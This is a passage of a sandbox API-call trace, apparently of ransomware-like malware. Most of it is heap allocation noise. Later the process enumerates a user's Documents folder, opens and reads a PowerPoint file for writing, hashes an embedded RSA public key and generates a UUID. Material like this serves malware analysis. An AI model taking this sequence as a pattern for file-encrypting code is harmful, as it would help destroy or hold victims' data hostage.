RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0195.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0195.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0195.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.940] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0195.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.940] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.940] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0195.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.941] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.941] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.943] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.943] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.944] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.944] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.944] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.944] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.944] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0195.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0195.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0195.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.951] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\") returned="hhuy\\" [0195.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea14a0 [0195.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.951] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\") returned="Documents\\" [0195.951] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0195.951] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0195.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0195.951] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0195.951] PathFindFileNameW (pszPath="") returned="" [0195.951] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x25c9eb00, ftCreationTime.dwHighDateTime=0x1d89ace, ftLastAccessTime.dwLowDateTime=0xf19708e0, ftLastAccessTime.dwHighDateTime=0x1d89e4c, ftLastWriteTime.dwLowDateTime=0xf19708e0, ftLastWriteTime.dwHighDateTime=0x1d89e4c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0195.953] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.953] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x25c9eb00, ftCreationTime.dwHighDateTime=0x1d89ace, ftLastAccessTime.dwLowDateTime=0xf19708e0, ftLastAccessTime.dwHighDateTime=0x1d89e4c, ftLastWriteTime.dwLowDateTime=0xf19708e0, ftLastWriteTime.dwHighDateTime=0x1d89e4c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0195.953] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4105fa0, ftCreationTime.dwHighDateTime=0x1d897de, ftLastAccessTime.dwLowDateTime=0xf4481430, ftLastAccessTime.dwHighDateTime=0x1d8991f, ftLastWriteTime.dwLowDateTime=0xf4481430, ftLastWriteTime.dwHighDateTime=0x1d8991f, nFileSizeHigh=0x0, nFileSizeLow=0x163c6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4Q235S.pptx", cAlternateFileName="4Q235S~1.PPT")) returned 1 [0195.953] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\4Q235S.pptx") returned=".pptx" [0195.953] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\4Q235S.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\4q235s.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0195.954] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=91078) returned 1 [0195.954] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0195.957] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x163a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.957] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0195.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0195.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0195.959] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.959] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x163c6, lpOverlapped=0x0) returned 1 [0195.960] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0195.961] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.961] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.961] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0195.962] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0195.962] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0195.962] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0195.962] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0195.962] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0195.962] GetLastError () returned 0x0 [0195.962] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0195.962] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0195.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0195.962] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0195.962] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0195.962] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0195.963] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0195.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0195.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0195.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x163d0) returned 0x2ea79b0 [0195.963] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0195.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0195.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0195.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0195.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0195.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0195.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea14a0 [0195.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d20 [0195.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea14e8 [0195.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d38 [0195.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d68 [0195.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2dc8 [0195.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d80 [0195.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0195.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0195.964] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0195.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0195.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d68 | out: hHeap=0x620000) returned 1 [0195.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d80 | out: hHeap=0x620000) returned 1 [0195.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2dc8 | out: hHeap=0x620000) returned 1 [0195.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0195.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0195.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2dc8 [0195.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0195.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2d80 [0195.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0195.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2d68 [0195.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0195.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99af8 [0195.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b60 [0195.966] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0195.966] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0195.966] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99d28 [0195.966] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0195.966] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0195.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0195.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d80 | out: hHeap=0x620000) returned 1 [0195.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0195.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d68 | out: hHeap=0x620000) returned 1 [0195.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0195.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0195.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2dc8 | out: hHeap=0x620000) returned 1 [0195.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0195.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0195.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0195.967] GetCurrentThreadId () returned 0x66c [0195.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0195.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea4cc0 [0195.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0195.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0195.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0195.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0195.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0195.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0195.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.968] GetCurrentThreadId () returned 0x66c [0195.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0195.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0195.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0195.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0195.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccad98 [0195.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0195.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0195.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0195.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2dc8 [0195.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0195.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0195.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0195.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0195.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0195.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0195.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0195.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 